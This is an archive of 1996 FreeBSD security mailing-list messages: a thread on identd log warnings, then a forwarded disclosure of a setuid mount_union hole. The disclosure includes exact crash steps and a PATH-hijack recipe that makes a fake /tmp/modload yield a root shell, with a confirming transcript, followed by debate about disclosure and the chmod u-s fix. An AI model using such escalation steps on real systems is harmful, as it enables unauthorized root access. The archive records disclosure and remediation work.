From owner-freebsd-security Mon May 13 03:25:55 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA09945 for security-outgoing; Mon, 13 May 1996 03:25:55 -0700 (PDT)
Received: from falcon.tioga.com (root@falcon.tioga.com [205.146.65.5]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA09939 for ; Mon, 13 May 1996 03:25:52 -0700 (PDT)
Received: (from tbalfe@localhost) by falcon.tioga.com (8.7.5/8.6.12) id GAA02731; Mon, 13 May 1996 06:26:30 GMT
Date: Mon, 13 May 1996 06:26:30 +0000 ()
From: Thomas J Balfe
To: freebsd-security@freebsd.org
Subject: anyone ever get this message?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

May 13 06:22:39 falcon in.identd[2686]: warning: can't get client address: Socket is not connected
May 13 06:22:39 falcon in.identd[2686]: connect from unknown

========================================================================
Thomas J Balfe                    tbalfe@tioga.com
President                         http://www.tioga.com/
Tioga Communications, Inc         814-867-4770
========================================================================

From owner-freebsd-security Mon May 13 07:42:51 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id HAA24991 for security-outgoing; Mon, 13 May 1996 07:42:51 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id HAA24954 for ; Mon, 13 May 1996 07:42:43 -0700 (PDT)
Message-Id: <199605131442.HAA24954@freefall.freebsd.org>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA037908521; Tue, 14 May 1996 00:42:01 +1000
From: Darren Reed
Subject: Re: anyone ever get this message?
To: tbalfe@tioga.com (Thomas J Balfe)
Date: Tue, 14 May 1996 00:42:01 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "Thomas J Balfe" at May 13, 96 06:26:30 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

In some mail from Thomas J Balfe, sie said:
>
> May 13 06:22:39 falcon in.identd[2686]: warning: can't get client
> address: Socket is not connected
> May 13 06:22:39 falcon in.identd[2686]: connect from unknown

Looks like a half-open port scan. Linux does similar and on BSD tcp wrappers, for the most part, don't pick them up.

Unless you have something recording packets, you'll never see the source address (connection is closed before accept can work).

darren

From owner-freebsd-security Mon May 13 10:56:00 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA08579 for security-outgoing; Mon, 13 May 1996 10:56:00 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA08573 for ; Mon, 13 May 1996 10:55:58 -0700 (PDT)
Received: (from scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) id NAA06845; Mon, 13 May 1996 13:55:00 -0400 (EDT)
Date: Mon, 13 May 1996 13:55:00 -0400 (EDT)
From: Scanner SOD
To: Thomas J Balfe
cc: freebsd-security@freebsd.org
Subject: Re: anyone ever get this message?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 13 May 1996, Thomas J Balfe wrote:

> May 13 06:22:39 falcon in.identd[2686]: warning: can't get client
> address: Socket is not connected
> May 13 06:22:39 falcon in.identd[2686]: connect from unknown

I've had that before on a stock system. But after throwing tcpwrappers on and a new pidentd it stopped. I don't know why but it did.
--
===================================| Webspan Inc., ISP Division.
FreeBSD 2.1.0 is available now!    | Phone: 908-367-8030 ext. 126
-----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701
Turning PCs into Workstations      | E-Mail: scanner@webspan.net
===================================| SysAdmin / Network Engineer / Consultant

From owner-freebsd-security Wed May 15 16:17:07 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA01871 for security-outgoing; Wed, 15 May 1996 16:17:07 -0700 (PDT)
Received: from haven.uniserve.com (haven.uniserve.com [198.53.215.121]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA01866 for ; Wed, 15 May 1996 16:17:04 -0700 (PDT)
Received: by haven.uniserve.com id <30761-153>; Wed, 15 May 1996 16:20:29 -0800
Date: Wed, 15 May 1996 16:20:18 -0700 (PDT)
From: Tom Samplonius
To: Darren Reed
cc: Thomas J Balfe , freebsd-security@freebsd.org
Subject: Re: anyone ever get this message?
In-Reply-To: <199605131442.HAA24954@freefall.freebsd.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 14 May 1996, Darren Reed wrote:

> In some mail from Thomas J Balfe, sie said:
> >
> > May 13 06:22:39 falcon in.identd[2686]: warning: can't get client
> > address: Socket is not connected
> > May 13 06:22:39 falcon in.identd[2686]: connect from unknown
>
> Looks like a half-open port scan.

No, inetd wouldn't spawn identd unless the socket was open.

> Linux does similar and on BSD tcp wrappers, for the most part, don't pick
> them up.
>
> Unless you have something recording packets, you'll never see the source
> address (connection is closed before accept can work).
Here's probably what happens:

- you initiate connect to some server
- server sends ident query
- you close your connect to server
- ident query arrives but socket doesn't exist

Tom

From owner-freebsd-security Wed May 15 16:34:38 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA03168 for security-outgoing; Wed, 15 May 1996 16:34:38 -0700 (PDT)
Received: from kes.tioga.com (root@kes.tioga.com [205.146.65.40]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA03155 for ; Wed, 15 May 1996 16:34:29 -0700 (PDT)
Received: (from tbalfe@localhost) by kes.tioga.com (8.7.5/8.6.12) id TAA01750; Wed, 15 May 1996 19:34:54 GMT
Date: Wed, 15 May 1996 19:34:54 +0000 ()
From: Thomas J Balfe
To: Tom Samplonius
cc: Darren Reed , freebsd-security@freebsd.org
Subject: Re: anyone ever get this message?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Here's probably what happens:
>
> - you initiate connect to some server
> - server sends ident query
> - you close your connect to server
> - ident query arrives but socket doesn't exist

This never used to happen with sendmail 8.6.12, but with 8.7.5 it seems to happen.
I got sendmail from ftp.cert.org, although I don't want to go back to 8.6.12...hmmm

========================================================================
Thomas J Balfe                    tbalfe@tioga.com
President                         http://www.tioga.com/
Tioga Communications, Inc         814-867-4770
========================================================================

From owner-freebsd-security Wed May 15 16:39:18 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA03599 for security-outgoing; Wed, 15 May 1996 16:39:18 -0700 (PDT)
Received: from haven.uniserve.com (haven.uniserve.com [198.53.215.121]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id QAA03594 for ; Wed, 15 May 1996 16:39:16 -0700 (PDT)
Received: by haven.uniserve.com id <30792-147>; Wed, 15 May 1996 16:42:39 -0800
Date: Wed, 15 May 1996 16:42:32 -0700 (PDT)
From: Tom Samplonius
To: Thomas J Balfe
cc: Darren Reed , freebsd-security@freebsd.org
Subject: Re: anyone ever get this message?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 15 May 1996, Thomas J Balfe wrote:

> > Here's probably what happens:
> >
> > - you initiate connect to some server
> > - server sends ident query
> > - you close your connect to server
> > - ident query arrives but socket doesn't exist
>
>
> This never used to happen with sendmail 8.6.12, but with 8.7.5 it seems
> to happen. I got sendmail from ftp.cert.org, although I don't want to go
> back to 8.6.12...hmmm

It isn't serious. ident(d) shouldn't be trusted anyways.
Tom

From owner-freebsd-security Fri May 17 00:47:41 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA24651 for security-outgoing; Fri, 17 May 1996 00:47:41 -0700 (PDT)
Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA24645 for ; Fri, 17 May 1996 00:47:38 -0700 (PDT)
Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id AAA21251 for ; Fri, 17 May 1996 00:47:35 -0700 (PDT)
Date: Fri, 17 May 1996 00:47:31 -0700 (PDT)
From: invalid opcode
To: freebsd-security@freebsd.org
Subject: BoS: SECURITY BUG in FreeBSD (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

hmmmmm

== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==

---------- Forwarded message ----------
Date: Fri, 17 May 1996 09:12:13 METDST
From: Krzysztof Labanowski
To: best-of-security@suburbia.net
Subject: BoS: SECURITY BUG in FreeBSD

Hi!

FreeBSD has a security hole... dangerous is mount_union if suid is set

vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable

to crash system (as a normal user) try this:

mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b

to get euid try this:

export PATH=/tmp:$PATH    #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2

and You are root!
Hole found by Adam Kubicki

Best wishes
Chris Labanowski
KL

From owner-freebsd-security Fri May 17 00:50:41 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA24832 for security-outgoing; Fri, 17 May 1996 00:50:41 -0700 (PDT)
Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA24826 for ; Fri, 17 May 1996 00:50:39 -0700 (PDT)
Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id AAA21276; Fri, 17 May 1996 00:50:35 -0700 (PDT)
Date: Fri, 17 May 1996 00:50:35 -0700 (PDT)
From: invalid opcode
To: freebsd-security@freebsd.org
cc: jkh@time.cdrom.com
Subject: very bad
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Uh oh
This is valid

[coredump@onyx] ~> sh
$ export PATH=/tmp:$PATH
$ echo /bin/sh >/tmp/modload
$ chmod +x /tmp/modload
$ mount_union /dir1 /dir2
#
# w

== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==

From owner-freebsd-security Fri May 17 01:09:50 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id BAA25897 for security-outgoing; Fri, 17 May 1996 01:09:50 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id BAA25891; Fri, 17 May 1996 01:09:46 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with SMTP id BAA13473; Fri, 17 May 1996 01:08:25 -0700 (PDT)
To: invalid opcode
cc: freebsd-security@freebsd.org, security-officer@freebsd.org
Subject: Re: very bad
In-reply-to: Your message of "Fri, 17 May 1996 00:50:35 PDT."
Date: Fri, 17 May 1996 01:08:24 -0700
Message-ID: <13470.832320504@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Uh oh
> This is valid

Ow! :-(

Thanks for reporting this!

You know though, for ones this bad I'd really rather you sent the message to security-officer@freebsd.org rather than freebsd-security in the future. There are easily over 1000 people on this list and you just announced a cookbook method for any shell account user to go root on a FreeBSD based ISP box; hardly the kind of information one would want to see widely circulated without a prepared fix, at the least. :-(

Jordan

From owner-freebsd-security Fri May 17 01:26:58 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id BAA26911 for security-outgoing; Fri, 17 May 1996 01:26:58 -0700 (PDT)
Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id BAA26900; Fri, 17 May 1996 01:26:53 -0700 (PDT)
Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id BAA21562; Fri, 17 May 1996 01:26:44 -0700 (PDT)
Date: Fri, 17 May 1996 01:26:43 -0700 (PDT)
From: invalid opcode
To: "Jordan K. Hubbard"
cc: freebsd-security@freebsd.org, security-officer@freebsd.org
Subject: Re: very bad
In-Reply-To: <13470.832320504@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Fri, 17 May 1996, Jordan K. Hubbard wrote:

> Ow! :-(
>
> Thanks for reporting this!
>
> You know though, for ones this bad I'd really rather you sent the
> message to security-officer@freebsd.org rather than freebsd-security
> in the future. There are easily over 1000 people on this list and you
> just announced a cookbook method for any shell account user to go root
> on a FreeBSD based ISP box; hardly the kind of information one would
> want to see widely circulated without a prepared fix, at the
> least. :-(
> Jordan

Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(
And I would have sent it to security-officer@freebsd.org had I even known of such an address. The prepared fix is chmod u-s /sbin/mount_union.

== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==

From owner-freebsd-security Fri May 17 01:35:26 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id BAA27506 for security-outgoing; Fri, 17 May 1996 01:35:26 -0700 (PDT)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id BAA27499; Fri, 17 May 1996 01:35:20 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with SMTP id BAA13644; Fri, 17 May 1996 01:33:59 -0700 (PDT)
To: invalid opcode
cc: freebsd-security@freebsd.org, security-officer@freebsd.org
Subject: Re: very bad
In-reply-to: Your message of "Fri, 17 May 1996 01:26:43 PDT."
Date: Fri, 17 May 1996 01:33:59 -0700
Message-ID: <13642.832322039@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(

Ah well, what's done is done.

> of such an address. The prepared fix is chmod u-s /sbin/mount_union.

It should at least return EPERM! :-)

Jordan

From owner-freebsd-security Fri May 17 02:08:48 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id CAA00323 for security-outgoing; Fri, 17 May 1996 02:08:48 -0700 (PDT)
Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id CAA00318 for ; Fri, 17 May 1996 02:08:44 -0700 (PDT)
Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id CAA22740; Fri, 17 May 1996 02:08:41 -0700 (PDT)
Date: Fri, 17 May 1996 02:08:40 -0700 (PDT)
From: invalid opcode
To: freebsd-security@freebsd.org
cc: jkh@time.cdrom.com
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

FWIW, I just forwarded the quick fix of chmod u-s /sbin/mount_union and a copy of the problem to root@everyone on www.freebsd.org 's gallery of freebsd'ers. Considering the bug details have already been posted to BUGTRAQ and BoS, there is really nothing you can do after that to stop the "bad guys" from hearing about it as they are most definitely on those lists.
== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==

From owner-freebsd-security Fri May 17 03:09:20 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA04816 for security-outgoing; Fri, 17 May 1996 03:09:20 -0700 (PDT)
Received: from terra.stack.urc.tue.nl (terra.stack.urc.tue.nl [131.155.140.128]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA04808 for ; Fri, 17 May 1996 03:09:16 -0700 (PDT)
Received: from xaa.stack.urc.tue.nl (uucp@localhost) by terra.stack.urc.tue.nl (8.7.5) with UUCP id MAA05982; Fri, 17 May 1996 12:09:04 +0200 (MET DST)
Received: (from freebsd@localhost) by xaa.stack.urc.tue.nl (8.7.5/8.6.12) id MAA00566; Fri, 17 May 1996 12:06:00 +0200 (MET DST)
From: FreeBSD matters of Mark Huizer (xaa)
Message-Id: <199605171006.MAA00566@xaa.stack.urc.tue.nl>
Subject: Re: very bad
To: coredump@nervosa.com (invalid opcode)
Date: Fri, 17 May 1996 12:05:59 +0200 (MET DST)
Cc: freebsd-security@FreeBSD.org, jkh@time.cdrom.com
In-Reply-To: from invalid opcode at "May 17, 96 00:50:35 am"
Reply-To: xaa@stack.urc.tue.nl (Mark Huizer)
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

> [coredump@onyx] ~> sh
> $ export PATH=/tmp:$PATH
> $ echo /bin/sh >/tmp/modload
> $ chmod +x /tmp/modload
> $ mount_union /dir1 /dir2
> #
> # w
>

Well... if you want to allow for user-mounts, you shouldn't let it be an lkm. Is that so weird?
Mark

From owner-freebsd-security Fri May 17 03:10:22 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA04919 for security-outgoing; Fri, 17 May 1996 03:10:22 -0700 (PDT)
Received: from EUnet.yu ([194.247.192.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA04852 for ; Fri, 17 May 1996 03:09:57 -0700 (PDT)
Received: (from vjojic@localhost) by EUnet.yu (8.7.5/8.6.12) id MAA00475 for freebsd-security@freebsd.org; Fri, 17 May 1996 12:09:30 +0200 (MET DST)
From: Vladimir Jojic
Message-Id: <199605171009.MAA00475@EUnet.yu>
Subject: Re: very bad
To: freebsd-security@freebsd.org
Date: Fri, 17 May 1996 12:09:30 +0200 (MET DST)
In-Reply-To: from "invalid opcode" at May 17, 96 01:26:43 am
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hi,

What IS very bad about this whole thing, isn't existence of this bug, as much as how easily information about it can be obtained. Even if you do send patch along with info, there is still danger that someone, gets up earlier than root, and then ... (sweet dreams, root!)

I am not very familiar with mailing list programs, but there is possible improvement (if it isn't yet done):

- add special class of mailing list, such as security list
- when user wants to be added to this list, program checks if his root (of system from which mail came) is on the list:
  1. yes, inform root (or address he left), about that user (even ask if he allows him to join this list, this is a bit fascist, but that's security)
  2. not, inform root about existence of this list, ask him if he wants to join (where to send him mail, how much to *delay* info on bugs to users on his system, or not even allow them to join (hey, maybe system is crackers' nest)); if not, ask him should the user be allowed to join list

I believe that it is obvious why *delay* is so important. This is just the sketch, of course. Maybe this message isn't for this list, but it certainly concerns all of the readers. I admit that *delay* is a bit strong, but so are the closed lists.

There is still one problem, if we have a root of small system not connected to Internet, he can receive mail only on other system, that is connected. Root of system connected to Internet receives info before root of small system, and if has any malicious intention, he can surely mess things up. But that comes to domain of human nature. I am not saying that this will solve all problems, but will *delay* some.

Please, give your opinions on this,

Vladimir Jojic (guru apprentice, still looking for teacher ... :)
vjojic@EUnet.yu

>
> On Fri, 17 May 1996, Jordan K. Hubbard wrote:
>
> > Ow! :-(
> >
> > Thanks for reporting this!
> >
> > You know though, for ones this bad I'd really rather you sent the
> > message to security-officer@freebsd.org rather than freebsd-security
> > in the future. There are easily over 1000 people on this list and you
> > just announced a cookbook method for any shell account user to go root
> > on a FreeBSD based ISP box; hardly the kind of information one would
> > want to see widely circulated without a prepared fix, at the
> > least. :-(
> > Jordan
>
> Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(
> And I would have sent it to security-officer@freebsd.org had I even known
> of such an address. The prepared fix is chmod u-s /sbin/mount_union.
>
> == Chris Layne ======================================== Nervosa Computing ==
> == coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==
>
>

From owner-freebsd-security Fri May 17 03:53:01 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id DAA06943 for security-outgoing; Fri, 17 May 1996 03:53:01 -0700 (PDT)
Received: from sasami.jurai.net (root@sasami.jurai.net [206.151.208.162]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id DAA06938 for ; Fri, 17 May 1996 03:52:59 -0700 (PDT)
Received: from localhost (winter@localhost) by sasami.jurai.net (8.7.4/8.7.3) with SMTP id FAA00410; Fri, 17 May 1996 05:52:50 -0500 (CDT)
Date: Fri, 17 May 1996 05:52:49 -0500 (CDT)
From: "Matthew N. Dodd"
X-Sender: winter@sasami
To: invalid opcode
cc: freebsd-security@freebsd.org
Subject: Re: very bad
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I tried it and it crashed my box. Still, it's not nice either way.

I was online at the time chatting with the other admin and we blitzed all of our boxes.

On Fri, 17 May 1996, invalid opcode wrote:

> Uh oh
> This is valid
>
> [coredump@onyx] ~> sh
> $ export PATH=/tmp:$PATH
> $ echo /bin/sh >/tmp/modload
> $ chmod +x /tmp/modload
> $ mount_union /dir1 /dir2
> #
> # w

| Matthew N. Dodd   | winter@jurai.net    | http://www.jurai.net/~winter |
| Technical Manager | mdodd@intersurf.net | http://www.intersurf.net     |
| InterSurf Online  | "Welcome to the net Sir, would you like a handbasket?" |

From owner-freebsd-security Fri May 17 04:02:02 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id EAA07510 for security-outgoing; Fri, 17 May 1996 04:02:02 -0700 (PDT)
Received: from ptavv.nsta.org (ptavv.gfoster.com [199.0.2.254]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id EAA07499 for ; Fri, 17 May 1996 04:01:58 -0700 (PDT)
Received: (from gfoster@localhost) by ptavv.nsta.org (8.7.5/8.6.12) id HAA00301; Fri, 17 May 1996 07:00:35 -0400 (EDT)
Date: Fri, 17 May 1996 07:00:35 -0400 (EDT)
From: Glen Foster
Message-Id: <199605171100.HAA00301@ptavv.nsta.org>
To: jkh@time.cdrom.com
CC: coredump@nervosa.com, freebsd-security@FreeBSD.ORG
In-reply-to: <13642.832322039@time.cdrom.com> (jkh@time.cdrom.com)
Subject: Re: very bad
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

I, for one, am very happy that he announced it to the group rather than attempting STO. I was able to fix the systems for which I have responsibility immediately. Thanks to Chris for getting the word out!

It will be interesting to see an announcement coming from CERT two or three months from now about a "new" security bug.

Now the big question, except for the obvious, why was mount_union suid in the first place?

---
Glen Foster

> Date: Fri, 17 May 1996 01:33:59 -0700
> From: "Jordan K. Hubbard"
>
> > Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(
>
> Ah well, what's done is done.
>
> > of such an address. The prepared fix is chmod u-s /sbin/mount_union.
>
> It should at least return EPERM! :-)
>
> Jordan
>
>

From owner-freebsd-security Fri May 17 05:18:05 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id FAA12529 for security-outgoing; Fri, 17 May 1996 05:18:05 -0700 (PDT)
Received: from onyx.auscert.org.au (onyx0.auscert.org.au [203.5.112.10]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id FAA12524 for ; Fri, 17 May 1996 05:18:02 -0700 (PDT)
Received: from amethyst.auscert.org.au (amethyst.auscert.org.au [203.5.112.218]) by onyx.auscert.org.au (8.7.5/8.7.1) with ESMTP id WAA05141; Fri, 17 May 1996 22:18:00 +1000 (EST)
Received: from localhost (localhost [127.0.0.1]) by amethyst.auscert.org.au (8.7.5/8.7.2) with SMTP id WAA11280; Fri, 17 May 1996 22:17:58 +1000 (EST)
Message-Id: <199605171217.WAA11280@amethyst.auscert.org.au>
X-Authentication-Warning: amethyst.auscert.org.au: Host localhost [127.0.0.1] didn't use HELO protocol
To: Vladimir Jojic
cc: freebsd-security@freebsd.org
Subject: Re: very bad
In-reply-to: Your message of "Fri, 17 May 1996 12:09:30 +0200." <199605171009.MAA00475@EUnet.yu>
Date: Fri, 17 May 1996 22:17:57 +1000
From: Danny Smith
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Vladimir Jojic writes:

> What IS very bad about this whole thing, isn't existence of this bug,
> as much as how easily information about it can be obtained. Even if
> you do send patch along with info, there is still danger that someone,
> gets up earlier than root, and then ... (sweet dreams, root!)

> > You know though, for ones this bad I'd really rather you sent the
> > message to security-officer@freebsd.org rather than freebsd-security
> > in the future. There are easily over 1000 people on this list and you
> > just announced a cookbook method for any shell account user to go root
> > on a FreeBSD based ISP box; hardly the kind of information one would
> > want to see widely circulated without a prepared fix, at the
> > least. :-(

Another unfortunate part is that it is approaching midnight in Australia (and it is now past midnight in New Zealand) at the start of the weekend. Posting vulnerability information like this has not helped any system administrators if they are all home for the weekend. All it has done is increase the exposure of their systems to attack by more people.

I personally don't think that is helping anyone at all.

Danny Smith.

==========================================================================
Danny Smith                    | Fax:    +61 7 3365 4477
AUSCERT                        | Phone:  +61 7 3365 4417
c/- Prentice Centre            |   (answered during business hours)
The University of Queensland   |   (on call after hours for emergencies)
Qld.  4072.  Australia         | Internet: auscert@auscert.org.au

Standard Disclaimer: My opinions do not necessarily reflect the policy of AUSCERT or The University of Queensland.

From owner-freebsd-security Fri May 17 05:52:33 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id FAA13998 for security-outgoing; Fri, 17 May 1996 05:52:33 -0700 (PDT)
Received: from sasami.jurai.net (root@sasami.jurai.net [206.151.208.162]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id FAA13993 for ; Fri, 17 May 1996 05:52:30 -0700 (PDT)
Received: from localhost (winter@localhost) by sasami.jurai.net (8.7.4/8.7.3) with SMTP id HAA01641; Fri, 17 May 1996 07:52:22 -0500 (CDT)
Date: Fri, 17 May 1996 07:52:21 -0500 (CDT)
From: "Matthew N. Dodd"
X-Sender: winter@sasami
To: invalid opcode
cc: freebsd-security@FreeBSD.org
Subject: Re: your mail
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Fri, 17 May 1996, invalid opcode wrote:

> FWIW, I just forwarded the quick fix of chmod u-s /sbin/mount_union and a
> copy of the problem to root@everyone on www.freebsd.org 's gallery of
> freebsd'ers. Considering the bug details have already been posted to
> BUGTRAQ and BoS, there is really nothing you can do after that to stop
> the "bad guys" from hearing about it as they are most definitely on those
> lists.

*evil cackle*

My management luser forwarded me a copy of that with the frantic note "Do you know about this!!!?!"

It was quite nice to be able to say "Yes, it's been fixed for 3 hours, let me sleep damn it."

*grin*

Thanks for getting the info out Chris.

| Matthew N. Dodd   | winter@jurai.net    | http://www.jurai.net/~winter |
| Technical Manager | mdodd@intersurf.net | http://www.intersurf.net     |
| InterSurf Online  | "Welcome to the net Sir, would you like a handbasket?" |

From owner-freebsd-security Fri May 17 07:04:59 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id HAA18751 for security-outgoing; Fri, 17 May 1996 07:04:59 -0700 (PDT)
Received: from fslg8.fsl.noaa.gov (fslg8.fsl.noaa.gov [137.75.131.171]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id HAA18746 for ; Fri, 17 May 1996 07:04:54 -0700 (PDT)
Received: by fslg8.fsl.noaa.gov (5.57/Ultrix3.0-C) id AA04147; Fri, 17 May 96 14:04:36 GMT
Message-Id: <9605171404.AA04147@fslg8.fsl.noaa.gov>
Received: by emu.fsl.noaa.gov (1.40.112.3/16.2) id AA172301877; Fri, 17 May 1996 08:04:37 -0600
Date: Fri, 17 May 1996 08:04:37 -0600
From: Sean Kelly
To: gfoster@gfoster.com
Cc: jkh@time.cdrom.com, coredump@nervosa.com, freebsd-security@freebsd.org
In-Reply-To: <199605171100.HAA00301@ptavv.nsta.org> (message from Glen Foster on Fri, 17 May 1996 07:00:35 -0400 (EDT))
Subject: Re: very bad
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>>>>> "Glen" == Glen Foster writes:

